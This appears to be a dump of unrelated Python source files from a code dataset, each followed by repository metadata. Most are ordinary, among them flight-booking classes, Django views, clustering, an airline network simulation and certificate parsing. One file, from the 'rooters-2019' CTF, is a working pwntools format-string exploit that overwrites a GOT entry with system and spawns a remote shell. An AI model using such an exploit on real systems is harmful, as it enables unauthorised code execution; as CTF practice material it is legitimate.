def add_passenger(self, passenger):
self.passengers_list.append(passenger)
# Airlines
airline_1 = Flight('UK - New Vegas', Boeing_747_8.owner)
airline_2 = Flight('Turkey - Paris', Boeing_747_400.owner)
airline_3 = Flight('New York - UK', Boeing_747_400ER.owner)
airline_4 = Flight('Spain - Portugal', Boeing_777_300.owner)
airline_5 = Flight('France - Germany', Boeing_777_300ER.owner)
list_flights = []
list_flights.append(airline_1)
list_flights.append(airline_2)
list_flights.append(airline_3)
list_flights.append(airline_4)
list_flights.append(airline_5)
list_passengers = []
list_passengers.append(passenger_1)
list_passengers.append(passenger_2)
list_passengers.append(passenger_3)
list_passengers.append(passenger_4)
list_passengers.append(passenger_5) | [
"kirtmorgan@live.com"
] | kirtmorgan@live.com |
78e368fb716111fadb4e8ba88e1ddd8e34f363a5 | 98b0d740346ad9aecd228b9a8ebb8e818908ce03 | /hr-1.py | 0d51517045973153f9d6f31c16975b8fb25a1e6b | [] | no_license | alexisbellido/python-examples | 8c63156a2800a584a8aff0909325e38acbe49163 | e6a4f61d9cd18588987430007e28ef036971764b | refs/heads/master | 2022-10-16T08:28:15.312916 | 2022-09-30T15:55:31 | 2022-09-30T15:55:31 | 240,379,353 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py | def hi(name):
return f'Hi, {name}'
if __name__ == '__main__':
# people = [input().split() for i in range(int(input()))]
# print(*name_format(people), sep='\n')
####################
people = [
'John',
'Mike',
]
# print(hi(people[0]))
# print(hi(people[1]))
# print(*hi(people), sep='\n')
| [
"alexis@ventanazul.com"
] | alexis@ventanazul.com |
d3c0c2a4b226f7e7de023845098715c9f079029c | 6484cdf98189f5f5736950c81a9d8d30e0f0c0db | /notifications/serializers.py | 488db18520ad943f4fc0b50ec121588e37fe25bd | [] | no_license | AlexFrundin/great_app_example | e0e9c91f06bfba76058f3af5b113a9399945bf6c | 23225e7e88f2ee51359d23cac2200b32b8bd6e20 | refs/heads/main | 2023-05-30T15:02:22.035811 | 2021-06-17T06:40:06 | 2021-06-17T06:40:06 | 339,434,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 519 | py | from rest_framework import serializers
from .models import Notification
# This class is use for serialize the data of user profile details
class NoitifcationListSerializer(serializers.ModelSerializer):
created_on = serializers.DateTimeField(format="%d %b %Y")
class Meta:
model = Notification
fields = (
'id',
'refrence_id',
'event_id',
'title',
'message',
'is_read',
'is_deleted',
'created_on')
| [
"aleksey.frundin@gmail.com"
] | aleksey.frundin@gmail.com |
8d00b1ee6bc068f204efbd23dc93e6b7be30deb3 | 36c170d204310f4e5985bd5c024a286acae36aba | /Labs/seminar/functii.py | 930df547edf5d8709c42ecbf513a6d063922f248 | [] | no_license | petrediana/Analiza-Datelor | 7cc6d1f31f6d7407e702d2cc29b9baa7ca1cda8c | 23d2282a0a662fe778aae5ec9d90e32c353bdec0 | refs/heads/master | 2020-08-04T05:52:36.700366 | 2019-12-10T08:20:54 | 2019-12-10T08:20:54 | 212,029,364 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 657 | py | import numpy as np
import pandas as pd
# trimit matricea ierarhie si cate clase vreau sa trimit
def partitie(h, k):
n = np.shape(h)[0] + 1 # numarul de instante
c = np.arange(n) # primii n clusteri
for i in range(n - k):
k1 = h[i, 0]
k2 = h[i, 1]
# se formeaza cluster n + i si trebuie sa includa toate instantele care erau in k1 si k2
c[c==k1] = n + i
c[c==k2] = n + i
#print(c)
c_transformat_categorie = pd.Categorical(c).codes # imi trasforma, imi intoarce in c_trans variabila categoriala cu cele k categorii
return ["c" + str(i + 1) for i in c_transformat_categorie] | [
"noreply@github.com"
] | noreply@github.com |
b2d0b95a6c5ee67ad0f1af6a3d34aaa04e489b4c | 25297ce593e7b5d8c7035f5992fd38538e8a4b6d | /ecom/api/order/urls.py | 47d94c48d82bb40e3382f9a0b258f2eae19c2d76 | [] | no_license | abhishek0405/MaskBazaar | fb2d955ba1fc73a8719cf23b3318972ae7455b7c | 71975fc7ab930859786719579821f6100fe7981d | refs/heads/main | 2023-01-07T13:48:14.201049 | 2020-11-22T14:29:21 | 2020-11-22T14:29:21 | 315,051,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | from rest_framework import routers
from django.urls import path, include
from . import views
router = routers.DefaultRouter()
router.register(r'',views.OrderViewSet) #'' as this invoked only when /api/product so no need to add extra
urlpatterns =[
path('add/<str:id>/<str:token>',views.add,name='order.add'),
path('',include(router.urls))#the one defined above
] | [
"abhishekanantharam123@gmail.com"
] | abhishekanantharam123@gmail.com |
923b0ab9979233ab582fe107d680fdaa2f83e04e | f6a639ad7782fa5e05905224e01aeefc7204a66f | /punto_2/animacion.py | 34e80f3465c84af1886dff168d53833977c71bf2 | [] | no_license | Angelicarjs/AngelicaMoreno_taller5 | 16b62ffd750f4ee1fb475e66be359cb63fd58441 | a0cb6164ee6f017f0c67004500d0f48b15e11ee3 | refs/heads/master | 2020-03-12T08:16:02.383897 | 2018-05-14T22:00:53 | 2018-05-14T22:00:53 | 130,523,842 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | import numpy as np
import matplotlib.pyplot as plt
from matplotlib import animation
#Importa datos
data = np.loadtxt('cuerda.txt')
x = data[0,:]
y = data[1,:]
fig, ax = plt.subplots()
#Dimensiones en x y y de la grafica
ax.set_xlim(( 0, 100))
ax.set_ylim((-5, 1))
| [
"noreply@github.com"
] | noreply@github.com |
5bfc7e94eef873db0f1be62c6ed282820f1cecc0 | 96cba510d390756372ba32ac8e7893db283f1c22 | /index.py | a14f38f37eb6899a16614fb171649c00ea355912 | [] | no_license | tjdnws1201/web2-python | f71f505ced95352eead5ca26d924535fbdc10542 | a4bf85df37ba2f3944dc9c9576580e501e3c0d37 | refs/heads/master | 2021-01-01T13:29:18.457819 | 2020-02-24T16:30:24 | 2020-02-24T16:30:24 | 239,299,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | #!python
print("Content-Type: text/html") # HTML is following
print()
import cgi, os, view, html_sanitizer
sanitizer = html_sanitizer.Sanitizer()
form = cgi.FieldStorage()
if 'id' in form:
title = pageId = form["id"].value
description = open('data/'+pageId,'r').read()
title = sanitizer.sanitize(title)
description = sanitizer.sanitize(description)
update_link = '<a href="update.py?id={}">update</a>'.format(pageId)
delete_action = '''
<form action="process_delete.py" method="post">
<input type="hidden" name="pageId" value="{}">
<input type="submit" value="delete">
</form>
'''.format(pageId)
else:
title = pageId = 'Welcome'
description = 'Hello, web'
update_link = ''
delete_action = ''
print('''<!doctype html>
<html>
<head>
<title>WEB - WELCOME</title>
<meta charset="utf-8">
</head>
<body>
<h1><a href="index.py">WEB</a></h1>
<ol>
{listStr}
</ol>
<a href="create.py">create</a>
{update_link}
{delete_action}
<h2>{title}</h2>
<p>{desc}</p>
</body>
</html>'''.format(
title=title,
desc=description,
listStr=view.getList(),
update_link=update_link,
delete_action=delete_action)
) | [
"noreply@github.com"
] | noreply@github.com |
2a6ed3ab36186dc4b2907c6eccfff147841622dd | bc28f8fe941caf281261afa1641868e743ecb5ab | /Google_APAC_Round_E/Beautiful_Numbers/Beautiful_Numbers.py | 07ce6d570af05b0e1e80e6cd90d4524fcd142a89 | [] | no_license | anubhavshrimal/CompetitiveProgrammingInPython | 9fc6949fb3cd715cfa8544c17a63ffbe52677b37 | 2692c446d49ec62d4967ed78a7973400db7ce981 | refs/heads/master | 2021-07-05T08:17:15.182154 | 2018-05-29T02:26:25 | 2018-05-29T02:26:25 | 60,554,340 | 7 | 6 | null | 2021-05-24T17:46:16 | 2016-06-06T19:18:27 | Python | UTF-8 | Python | false | false | 465 | py | import numpy as np
test = int(input())
for t in range(1, test+1):
num = int(input())
n1, n2 = abs(np.roots([1, 1, -(num-1)]))
if int(n1) != n1 or int(n2)!= n2:
ans = num-1
else:
if n1 == 1 or n1 == -1:
ans = n2
elif n2 == 1 or n2 == -1:
ans = n1
else:
if n2 > n1:
ans = n1
else:
ans = n2
print('Case #'+str(t)+':',str(int(ans)))
| [
"anubhavshrimal@gmail.com"
] | anubhavshrimal@gmail.com |
b1671f8ccb003ceab564735e721f938521ca0ce4 | 66edf859b44d1e020bf61f5c1ca3a1d2c0952e2e | /rooters-2019/xsh/exploit.py | 0fc6fbe4ebce1c3def064de17762d48b54086f86 | [] | no_license | farazsth98/CTF | 5f40fe745ad2c6f4697c203532517dc93c88cc08 | d2de238538c112ce1ac3aab939460c03b3f0f732 | refs/heads/master | 2023-04-13T20:29:09.611005 | 2021-04-24T17:53:05 | 2021-04-24T17:53:05 | 216,312,857 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,225 | py | #!/usr/bin/env python2
from pwn import *
elf = ELF('./xsh')
libc = ELF('./libc.so.6')
def start():
if not args.REMOTE:
return process('./xsh')
libc = ELF('./libc.so.6')
else:
return remote('35.192.206.226', 5555)
libc = ELF('./libc-remote.so.6')
def execute(cmd):
p.recv()
p.sendline(cmd)
return p.recvuntil('$')
context.terminal = ['tmux', 'new-window']
p = start()
if args.GDB:
gdb.attach(p)
# Get base address of binary
leak = execute('echo 0x%3$x')[:10]
elf.address = int(leak, 16) - 0x1249
strncmp_got = elf.got['strncmp']
system = elf.plt['system']
log.info('PIE base: ' + hex(elf.address))
log.info('strncmp_got: ' + hex(strncmp_got))
log.info('system: ' + hex(system))
# Prepare to write system to strncmp_got
# Calculate each half of the address
# This is to prevent the exploit from taking way too long to write a huge address
first = int('0x' + hex(system)[-4:], 16)
second = int(hex(system)[:6], 16)
# Do the format string overwrite
payload = 'echo' + p32(strncmp_got) + p32(strncmp_got+2)
payload += '%{}c%24$n%{}c%25$n'.format(first-4-3, second-first)
execute(payload)
# Execute /bin/sh for shell
p.recv()
p.sendline('/bin/sh')
p.interactive()
| [
"faraz.abrar9@gmail.com"
] | faraz.abrar9@gmail.com |
7054d92c14a1e6c568fc15281f3341cce89ae817 | 4c2136ab05913beba890b4127c2f608be4798ed2 | /(0, '')/py/fc_session.py | 751c6d3892c8e00fd0baf22a85673c65224e1427 | [] | no_license | Dyutee/test | 345adcd1769cba0f468090bcc311f4d379ea5f1e | b8b3718922bafbac1bad3802f6c885d777e1bb08 | refs/heads/master | 2021-01-12T04:19:45.511927 | 2016-12-29T07:25:29 | 2016-12-29T07:25:29 | 77,588,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,517 | py | #!/usr/bin/python
import cgitb, sys, header, common_methods
cgitb.enable()
sys.path.append('/var/nasexe/storage')
import storage_op
import sys,os
from lvm_infos import *
from functions import *
import san_disk_funs
check_fc = san_disk_funs.fc_target_status();
fc_target=san_disk_funs.fc_list_targets()
fc_ip = ''
ses = ''
########### FC Session ##########################
for session_tar in fc_target:
#print 'Session Target:'+str(session_tar)
#print '<br/>'
#print 'Sess Tar:'+str(session_tar)
#print '<br/>'
ses=san_disk_funs.fc_session(session_tar)
#print 'FC SESSION Info:'+str(sess)
import left_nav
#if (str(check_fc).find("'1'") > 0):
if (check_fc !=[]):
print
print """
<!--Right side body content starts from here-->
<div class="rightsidecontainer">
<div class="insidepage-heading">Fc >> <span class="content">Fc Session Information</span></div>
<!--tab srt-->
<div class="searchresult-container">
<div class="infoheader">
<div id="tabs">
<ul>
<li><a href="#tabs-1">Fc Session</a></li>
</ul>
<div id="tabs-1">
<!--form container starts here-->
<div class="form-container">
<div class="topinputwrap-heading">Fc Session Information </div>
<div class="inputwrap">
<div class="formrightside-content">
<form name = 'add_info' method = 'POST'>
<table width = "680" border = "1" cellspacing = "0" cellpadding = "0" name = 'disp_tables' id = 'id_target_info' style ="border-style:ridge;">"""
print"""<tr style = 'background-color:#999999; font-weight: bold;'>
<td height = "35px" valign = "middle" style = 'color: #FFF;'>Fc Target</td>
<td height = "35px" valign = "middle" style = 'color: #FFF;'>Connected Client</td>
</tr>"""
#print fc_target
if(ses !=''):
for tar_info in fc_target:
print"""<tr>
<!--<td class = "table_content" height = "35px" valign = "middle">
<a href = 'main.php?page=iscsi&act=add_disk_tgt_done&target=<?= $show_targets ?>'><img border = '0' style = 'margin-top: 2px;' src = '../images/add.png' title = 'Add disk to target' /></a> <a href = 'main.php?page=iscsi&act=del_disk_tgt_done&t=<?= $show_targets ?>'><img border = '0' src = '../images/fileclose.png' title = 'Remove disk from target' /></a> <a href = 'get_properties.php?target=<?= $show_targets ?>'><img border = '0' src = '../images/properties.png' title = 'Target properties' /></a> </td>-->
<td class = "table_content" height = "35px" valign = "middle">"""
print""" <font color ="darkred"><b>"""+tar_info+"""</b></font>"""
print """</td>"""
print"""<td class = "table_content" height = "35px" valign = "middle" style="font-family: Tahoma;text-decoration:blink;">"""
sesion_tar =sess=san_disk_funs.fc_session(tar_info)
replace_sess_nm = str(sesion_tar).replace('[]', '')
replace_sess_nm1 = str(replace_sess_nm).replace('[', '')
replace_sess_nm2 = str(replace_sess_nm1).replace(']', '')
replace_session_name = str(replace_sess_nm2).replace("'", '')
#print replace_session_name
if(replace_session_name!=''):
print"""<font color = 'darkgreen'><b>"""+replace_session_name+"""</b></font></td>"""
else:
print """
<marquee behavior="alternate" direction ="right"><b><font size="3">There is no Session for this client</font></b></marquee>
</td>
"""
else:
print"""<tr>
<td colspan = '3' align = 'center' height="50px;">
<marquee behavior="alternate" direction= "right"><b><font size="5">No Information is available</font></b></marquee>
</td>
</tr>"""
print"""
</table>
</form>
</div>"""
print"""
</div>
</div>
<!--form container ends here-->
</div>
</div>
</div>
</div>
<!--form container ends here-->
<!--form container starts here-->
<!--form container ends here-->
</div>
<!--Right side body content ends here-->
</div>
<!--Footer starts from here-->
<div class="insidefooter footer_content">© 2013 Opslag FS2</div>
<!-- Footer ends here-->
</div>
<!--inside body wrapper end-->
</div>"""
else:
print "<div style = 'margin-left: auto; margin-right: auto; text-align: center; vertical-align: center; color: darkred; width: 65%; font: 16px Arial;'><br/><br/><br/><b>Check the 'Enable/Disable FC' option in Maintenance -></b><a href= 'main.py?page=sr'><span style='text-decoration:underline;'>Services</span></a>.</div>"
print"""
<!--body wrapper end-->
</body>
</html>
"""
| [
"dyuteemoy46@gmail.com"
] | dyuteemoy46@gmail.com |
686ebbced947976bbb1149d1b104178043ff8612 | aafb41aab45562dfe08b2f142025a670dc4c5b80 | /scripts/ffhs-na-semesterarbeit/utils/utils.py | 376cc2c16a15cfccf108bd3c70e5d083df74c7b1 | [] | no_license | samuelblattner/ffhs-na-semesterarbeit | 1a61b55b60793557dd9b5d3b9ab025e8869fcbbd | c59d878806ab53fbc91b8861e820c1956f344fb3 | refs/heads/master | 2020-04-09T23:39:09.285217 | 2018-12-06T22:41:47 | 2018-12-06T22:41:47 | 160,662,796 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,179 | py | from random import random
from typing import Tuple, List, Dict
from dateutil import parser
EUROPEAN_COUNTRIES = (
'Albania',
'Andorra',
'Austria',
'Belarus',
'Belgium',
'Bosnia and Herzegovina',
'Bulgaria',
'Croatia',
'Czech Republic',
'Denmark',
'Estonia',
'Finland',
'France',
'Germany',
'Greece',
'Hungary',
'Iceland',
'Ireland',
'Italy',
'Latvia',
'Liechtenstein',
'Lithuania',
'Luxembourg',
'Malta',
'Moldova',
'Monaco',
'Netherlands',
'Norway',
'Poland',
'Portugal',
'Romania',
'Russia',
'San Marino',
'Serbia',
'Slovakia',
'Slovenia',
'Spain',
'Sweden',
'Switzerland',
'Ukraine',
'United Kingdom',
)
import sys
from datetime import datetime, timedelta
from math import radians, atan2, sqrt, cos, sin
import networkx as nx
from dateutil.tz import gettz
def calculate_distance_from_coordinates(lat1, lng1, lat2, lng2):
r = 6371.0
rad_lat1 = radians(lat1)
rad_lng1 = radians(lng1)
rad_lat2 = radians(lat2)
rad_lng2 = radians(lng2)
dlat = rad_lat2 - rad_lat1
dlng = rad_lng2 - rad_lng1
a = (sin(dlat / 2) ** 2) + (cos(rad_lat1) * cos(rad_lat2)) * (sin(dlng / 2) ** 2)
c = 2 * atan2(sqrt(a), sqrt(1 - a))
return r * c
def calculate_flight_duration_per_distance(network: nx.MultiDiGraph):
durations_per_km = []
for from_airport in network.nodes():
for f, t, k in network.out_edges(from_airport, keys=True):
if f == t:
continue
from_data = network.nodes[f]
to_data = network.nodes[t]
try:
dist = calculate_distance_from_coordinates(
from_data.get('latitude'),
from_data.get('longitude'),
to_data.get('latitude'),
to_data.get('longitude'),
)
except:
continue
flight_time = network.edges[f, t, k].get('duration')
durations_per_km.append(flight_time / dist)
return sum(durations_per_km) / len(durations_per_km)
def calculate_hub_attachment_likelihood(network: nx.MultiDiGraph, from_airport, to_airport):
p = 0.5
num_out_edges = len(network.out_edges(from_airport))
num_links1 = network.get_edge_data(from_airport, to_airport)
num_links1 = len(num_links1) if num_links1 else 0
num_links2 = network.get_edge_data(to_airport, from_airport)
num_links2 = len(num_links2) if num_links2 else 0
num_shared_edges = num_links1 + num_links2
return p * 1/network.number_of_nodes() + (1-p) * num_shared_edges / (1+num_out_edges)
def calculate_hub_neighbor_attachment_likelihood(network, from_airport, to_airport):
p = 0.2
# Find hubs that connect from and to airports
from_neighbors = set([t for f, t, k in network.out_edges(from_airport, keys=True)])
to_neighbors = set([t for f, t, k in network.out_edges(to_airport, keys=True)])
common_hubs = from_neighbors.intersection(to_neighbors)
random_connectivity = p * 1/network.number_of_nodes()
if len(common_hubs) == 0:
return random_connectivity
all_to_hub_strengths = []
for common_hub in common_hubs:
num_links1 = network.get_edge_data(from_airport, common_hub)
num_links1 = len(num_links1) if num_links1 else 0
num_links2 = network.get_edge_data(common_hub, from_airport)
num_links2 = len(num_links2) if num_links2 else 0
all_to_hub_strengths.append((
num_links1 + num_links2,
common_hub
))
strength, strongest_hub = sorted(all_to_hub_strengths, key=lambda hn: hn[0], reverse=True)[0]
existing_direct_routes1 = network.get_edge_data(from_airport, to_airport)
existing_direct_routes1 = len(existing_direct_routes1) if existing_direct_routes1 else 0
existing_direct_routes2 = network.get_edge_data(to_airport, from_airport)
existing_direct_routes2 = len(existing_direct_routes2) if existing_direct_routes2 else 0
existing_direct_routes = existing_direct_routes1 + existing_direct_routes2
neighbor_connectivity = (1-p) * (1 / ((1 + existing_direct_routes)**5)) * (strength / sum([s[0] for s in all_to_hub_strengths]))
return random_connectivity + neighbor_connectivity
def calculate_non_hub_connectivity(network: nx.MultiDiGraph, from_airport, to_airport):
p = 0.2
return p * 1/network.number_of_nodes() + (1-p) * 1/((network.degree(to_airport) + 1)**2)
def grow_traffic_by_x_years(network: nx.MultiDiGraph, years, growth_rate, duration_per_km, preferential_attachment=None):
num_of_edges = len(network.edges)
prospect_num_of_edges = num_of_edges * (growth_rate**years)
num_additional_edges = int(prospect_num_of_edges) - num_of_edges
DIST_CACHE = {}
num_distributed_new_edges = 0
while num_distributed_new_edges < num_additional_edges:
for fn, from_airport in enumerate(network.nodes()):
if num_distributed_new_edges >= num_additional_edges:
return
sys.stdout.write('\rDistributed: {} of {} new links'.format(num_distributed_new_edges, num_additional_edges))
for to_airport in network.nodes():
if num_distributed_new_edges >= num_additional_edges:
return
# Avoid connections to self
if from_airport == to_airport:
continue
if preferential_attachment == 'HUB':
p = calculate_hub_attachment_likelihood(network, from_airport, to_airport)
if random() > p:
continue
elif preferential_attachment == 'NEIGHBOR':
p = calculate_hub_neighbor_attachment_likelihood(network, from_airport, to_airport)
# sys.stdout.write('\rP: {} '.format(p))
if random() > p:
continue
elif preferential_attachment == 'NONHUB':
p = calculate_non_hub_connectivity(network, from_airport, to_airport)
# sys.stdout.write('\rP: {} '.format(p))
if random() > p:
continue
from_airport_obj = network.nodes[from_airport]
to_airport_obj = network.nodes[to_airport]
# Check existing connections between the airports.
# If there are any, we can just use their flight duration
for ef, et, ek in network.out_edges([from_airport, to_airport], keys=True):
if ef == from_airport and et == to_airport or ef == to_airport and et == to_airport:
flight_duration_in_min = network.edges[ef, et, ek].get('duration')
break
# If no connections exist yet
else:
distance = DIST_CACHE.get(from_airport, {}).get(to_airport, None)
if distance is None:
distance = calculate_distance_from_coordinates(
lat1=from_airport_obj.get('latitude'),
lng1=from_airport_obj.get('longitude'),
lat2=to_airport_obj.get('latitude'),
lng2=to_airport_obj.get('longitude')
)
DIST_CACHE.setdefault(from_airport, {to_airport: distance})
DIST_CACHE.setdefault(to_airport, {from_airport: distance})
flight_duration_in_min = int(distance * duration_per_km / 60)
utc_dep_time = datetime.strptime('{}:{}:00'.format(5 + int(15 * random()), int(12*random()) * 5), '%H:%M:%S').replace(
tzinfo=gettz(network.nodes[from_airport].get('timezone'))).astimezone()
utc_arr_time = utc_dep_time + timedelta(minutes=flight_duration_in_min)
network.add_edge(from_airport, to_airport, **{
'departureTimeUTC': utc_dep_time.strftime('%H:%M:%S'),
'arrivalTimeUTC': utc_arr_time.strftime('%H:%M:%S'),
'duration': flight_duration_in_min * 60
})
num_distributed_new_edges += 1
def create_flight_departures_arrivals_index(network) -> Tuple[Dict, Dict]:
"""
Creates two indices where arrivals and departures are collected by minute.
This helps to prevent the simulation from analyzing all flights for every
simulation step (minute) and thus reduces total simulation time greatly.
:param network:
:return:
"""
dep_index = {}
arr_index = {}
ins = 0
for node in network.nodes():
for f, t, k in network.out_edges(node, keys=True):
outbound_flight_data = network.edges[f, t, k]
scheduled_departure_utc = parser.parse(outbound_flight_data['departureTimeUTC']).time()
scheduled_departure_utc = scheduled_departure_utc.hour * 60 + scheduled_departure_utc.minute
dep_index.setdefault(scheduled_departure_utc, {}).setdefault(
'{}{}{}'.format(f, t, k),
(outbound_flight_data, f, t)
)
for f, t, k in network.in_edges(node, keys=True):
ins += 1
inbound_flight_data = network.edges[f, t, k]
scheduled_arrival_utc = parser.parse(inbound_flight_data['arrivalTimeUTC']).time()
scheduled_arrival_utc = scheduled_arrival_utc.hour * 60 + scheduled_arrival_utc.minute
arr_index.setdefault(scheduled_arrival_utc, {}).setdefault(
'{}{}{}'.format(f, t, k),
(inbound_flight_data, f, t)
)
return dep_index, arr_index
def create_airport_capacity_load_index(network, capacity_factor=1.2):
cap_index = {}
load_index = {}
for airport in network.nodes():
cap_index.setdefault(airport, {})
for f, t, k in network.out_edges(airport, keys=True):
outbound_flight_data = network.edges[f, t, k]
scheduled_departure_utc = parser.parse(outbound_flight_data['departureTimeUTC']).time()
cap_index[airport].setdefault(scheduled_departure_utc.hour, 0)
cap_index[airport][scheduled_departure_utc.hour] += 1
for f, t, k in network.in_edges(airport, keys=True):
inbound_flight_data = network.edges[f, t, k]
scheduled_arrival_utc = parser.parse(inbound_flight_data['arrivalTimeUTC']).time()
cap_index[airport].setdefault(scheduled_arrival_utc.hour, 0)
cap_index[airport][scheduled_arrival_utc.hour] += 1
max_cap = max(cap_index[airport].values()) if cap_index[airport].values() else 0
if airport == '9908':
print(network.nodes[airport]['codeIcaoAirport'])
print(max_cap)
print(max_cap/60)
cap_index[airport] = capacity_factor * max_cap
load_index[airport] = 0
return cap_index, load_index
def transform_to_random(network, duration_per_km=4.5):
transformed = nx.MultiDiGraph()
all_nodes_keys = list(network.nodes().keys())
num_edges = len(network.edges)
num_edges_added = 0
DIST_CACHE = {}
for node in network.nodes():
transformed.add_node(node, **network.nodes[node])
for f, t, k in network.edges:
# Select from and to airport randomly
from_airport = to_airport = -1
while from_airport == to_airport:
from_airport = all_nodes_keys[int(random() * len(all_nodes_keys))]
to_airport = all_nodes_keys[int(random() * len(all_nodes_keys))]
from_airport_obj = network.nodes[from_airport]
to_airport_obj = network.nodes[to_airport]
# Calculate distance and flight duration between them
distance = DIST_CACHE.get(from_airport, {}).get(to_airport, None)
if distance is None:
distance = calculate_distance_from_coordinates(
lat1=from_airport_obj.get('latitude'),
lng1=from_airport_obj.get('longitude'),
lat2=to_airport_obj.get('latitude'),
lng2=to_airport_obj.get('longitude')
)
DIST_CACHE.setdefault(from_airport, {to_airport: distance})
DIST_CACHE.setdefault(to_airport, {from_airport: distance})
flight_duration_in_min = int(distance * duration_per_km / 60)
# Choose a random departure time during the day
utc_dep_time = parser.parse(network.edges[f, t, k]['departureTimeUTC'])
# Calculate arrival time
utc_arr_time = utc_dep_time + timedelta(minutes=flight_duration_in_min)
# Add flight to new network
transformed.add_edge(
from_airport,
to_airport,
**{
'departureTimeUTC': utc_dep_time.strftime('%H:%M:%S'),
'arrivalTimeUTC': utc_arr_time.strftime('%H:%M:%S'),
'duration': flight_duration_in_min * 60
}
)
num_edges_added += 1
return transformed
| [
"samworks@gmx.net"
] | samworks@gmx.net |
e139bb21e3e65931f79037851b518967a20f1bdf | 6ce7ec83576e8021d050f86cd4c696a142f1798a | /final_exam/02.problem.py | 3bca39f6d99a95ed5fcbb067e335e57b32331afe | [] | no_license | Nanko-Nanev/fundamentals | 2707e20900dc779b96d453c978e8e74f1fb86fa4 | f46a655ff32bbfe6f3afeb4f3ab1fddc7a0edc89 | refs/heads/main | 2023-02-09T18:39:55.305854 | 2021-01-07T10:30:37 | 2021-01-07T10:30:37 | 326,507,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 470 | py | import re
pattern = r"^(\$|%)(?P<tag>[A-Z]{1}[a-z]+)\1:\s\[(?P<t1>[0-9]+)\]\|\[(?P<t2>[0-9]+)\]\|\[(?P<t3>[0-9]+)\]\|"
n = int(input())
for i in range(n):
data = input()
result = re.match(pattern, data)
if result:
obj = result.groupdict()
tag = (obj['tag'])
a = chr(int(obj['t1']))
b = chr(int(obj['t2']))
c = chr(int(obj['t3']))
print(f"{tag}: {a}{b}{c}")
else:
print(f"Valid message not found!") | [
"75886522+Nanko-Nanev@users.noreply.github.com"
] | 75886522+Nanko-Nanev@users.noreply.github.com |
a6fd335e1fab30bfd003446f4f96dc56ec322e38 | 0c08d190ebf4ac4469f1e5931171b84916d0ada8 | /Assignment 2/Static Slicing/main.py | a530f3e9d4e7431ada82f1bd3fc7b4aedfe992c5 | [] | no_license | Janahan10/SOFE-3980-Assignments | 95ef56c01c02a1125fcddb1b9ad58b376cf0066f | a2830b4da3f110e82e031384f46a5200809ab154 | refs/heads/main | 2023-03-30T22:15:41.680013 | 2021-03-28T17:42:44 | 2021-03-28T17:42:44 | 343,180,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | #!/usr/bin/python
import sys
def parse(statement, cur_line):
if statement in cur_line:
return True
return False
file = open("Source.txt", "r")
line_number = 1
for line in file:
if parse(sys.argv[1], line):
print('line ', line_number, ':', line.strip())
line_number += 1
file.close()
| [
"janahanravi10@gmail.com"
] | janahanravi10@gmail.com |
b0e91394bff1be5dfe354c640ced42e3fac6041c | e46c52607c763675e00182c5bdd3bb61ce0c6f48 | /lib/core/cert.py | b493f50f3bce4da1b182a21e7d05e5fae694e18c | [] | no_license | atlassion/PacketSenderLite | a610833380b19c59b3ae3a7de49fbd03fffffa28 | 3ff9db1e791deedfb2d7c638f94cd9cb5daa4a63 | refs/heads/master | 2023-06-09T15:03:28.278597 | 2021-06-22T11:49:08 | 2021-06-22T11:49:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,659 | py | from hashlib import sha256, sha1, md5
from typing import List
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.x509 import Certificate
__all__ = ['convert_bytes_to_cert', 'get_certificate_domains']
# noinspection PyUnresolvedReferences,PyProtectedMember,PyBroadException
def convert_bytes_to_cert(bytes_cert: bytes) -> dict:
cert = None
try:
cert = x509.load_der_x509_certificate(bytes_cert, default_backend())
except BaseException:
try:
cert = x509.load_pem_x509_certificate(bytes_cert, default_backend())
except BaseException:
pass
if cert:
result = {}
serial_number = cert.serial_number
issuer = cert.issuer
try:
result['validity'] = {}
result['validity']['end_datetime'] = cert.not_valid_after
result['validity']['start_datetime'] = cert.not_valid_before
result['validity']['end'] = result['validity']['end_datetime'].strftime('%Y-%m-%dT%H:%M:%SZ')
result['validity']['start'] = result['validity']['start_datetime'].strftime('%Y-%m-%dT%H:%M:%SZ')
except Exception:
pass
result['issuer'] = {}
dict_replace = {
'countryName': 'country',
'organizationName': 'organization',
'commonName': 'common_name'
}
try:
for n in issuer.rdns:
z = n._attributes[0]
name_k = z.oid._name
value = z.value
if name_k in dict_replace:
result['issuer'][dict_replace[name_k]] = [value]
except Exception:
pass
try:
if 'v' in cert.version.name:
result['version'] = cert.version.name.split('v')[1].strip()
except BaseException:
result['version'] = str(cert.version.value)
dnss = get_certificate_domains(cert)
atr = cert.subject._attributes
result['subject'] = {}
for i in atr:
for q in i._attributes:
result['subject'][q.oid._name] = [q.value]
if 'serialNumber' in list(result.keys()):
if len(result['serialNumber']) == 16:
result['serialNumber'] = '00' + result['serialNumber']
try:
result['serialNumber_int'] = int('0x' + result['serialNumber'], 16)
result['serial_number'] = str(result['serialNumber_int'])
except BaseException:
result['serialNumber_int'] = 0
result['names'] = dnss
if result['serialNumber_int'] == 0:
result['serial_number'] = str(serial_number)
result['serial_number_hex'] = str(hex(serial_number))
result['raw_serial'] = str(serial_number)
hashs = {
'fingerprint_sha256': sha256,
'fingerprint_sha1': sha1,
'fingerprint_md5': md5
}
for namehash, func in hashs.items():
hm = func()
hm.update(bytes_cert)
result[namehash] = hm.hexdigest()
remove_keys = ['serialNumber_int']
for key in remove_keys:
result.pop(key)
return result
# noinspection PyBroadException
def get_certificate_domains(cert: Certificate) -> List[str]:
"""
Gets a list of all Subject Alternative Names in the specified certificate.
"""
try:
for ext in cert.extensions:
ext = ext.value
if isinstance(ext, x509.SubjectAlternativeName):
return ext.get_values_for_type(x509.DNSName)
except BaseException:
return []
| [
"shadow.bfs@gmail.com"
] | shadow.bfs@gmail.com |
